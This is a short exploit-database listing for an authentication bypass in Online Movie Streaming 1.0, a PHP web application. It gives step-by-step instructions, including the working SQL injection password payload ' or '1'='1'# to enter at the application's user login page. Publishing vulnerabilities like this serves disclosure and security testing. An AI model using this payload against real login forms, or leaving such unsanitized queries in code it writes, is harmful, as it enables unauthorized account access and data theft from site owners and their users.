Online Movie Streaming 1.0 SQL Injection

Online Movie Streaming version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

MD5 | 0da9691efbdbf5bd54c0dbebcc348b83

Download

# Exploit Title: Online Movie Streaming  1.0 - Authentication Bypass
# Date: 2020-12-27
# Exploit Author:  Kshitiz Raj (manitorpotterk)
# Vendor Homepage: https://www.sourcecodester.com/php/14640/online-movie-streaming-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14640&title=+Online+Movie+Streaming+in+PHP+with+Full+Source+Code
# Version: 1.0
# Tested on: Windows 10/Kali Linux

Step 1 -  Go to url http://localhost/onlinemovie/user-login.php
Step 2 – Enter Username :-   [email protected]
Step 3 -  Enter Password - ' or '1'='1'#

Source: packetstormsecurity.com

Exploit Collector

Search Exploit

Online Movie Streaming 1.0 SQL Injection